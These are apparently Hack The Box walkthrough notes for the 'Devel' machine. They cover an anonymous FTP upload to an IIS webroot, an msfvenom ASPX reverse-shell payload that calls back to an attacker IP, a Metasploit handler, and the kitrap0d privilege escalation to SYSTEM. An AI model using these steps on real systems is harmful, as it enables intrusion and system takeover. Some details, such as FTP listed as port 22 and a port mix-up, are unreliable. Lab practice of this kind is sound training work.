Devel
HTB - 4. Devel
- 1.
nmap -T4 -p- -A 10.10.10.5
shows 22 (FTP) with anonymous login (to webroot directory?), 80 (HTTP) with Microsoft IIS httpd 7.5 - 2.Go to
10.10.10.5
which is a default web page - 3.
dirbuster
(dirb
andgobuster
popular as well) withhttp://10.10.10.5:80
, wordlist/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
, and change file-extension toasm, asmx, asp, aspx, txt
because server is IIS - 4.FTP: upload file to serverftp 10.10.10.5anonymousanonymouslspwdput dog.jpglsGo to
10.10.10.5/dog.jpg
and it executes. - 5.
msfvenom
Createreverse_tcp
payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspxOpen up port to listen on:sudo msfconsoleuse exploit/multi/handleroptionsset payload windows/meterpreter/reverse_tcpoptionsset LHOST 10.10.14.24run - 6.Back to FTPbinary <-- swith to binary instead of asciiput ex.aspxGo to
10.10.10.5/ex.aspx
and shell popped - 7.HackedsysinfogetuidResult: We are
IIS APPPOOL\Web
not authority system.getsystem
failed.Check to see which privilege escalation exploits might work:backgroundsearch suggesteruse post/multi/recon/local_exploit_suggesteroptionsset SESSION 1runRun privilege escalationuse exploit/windows/local/ms10_015_kitrap0doptionsset SESSION 1optionsrunoptionsset lhost 10.10.14.24 <-- make sure using the right interfaceset lport 4445 <-- Need to use different port since 4445 already in useoptionsrunResult: Shell popped with authority system
Last modified 9mo ago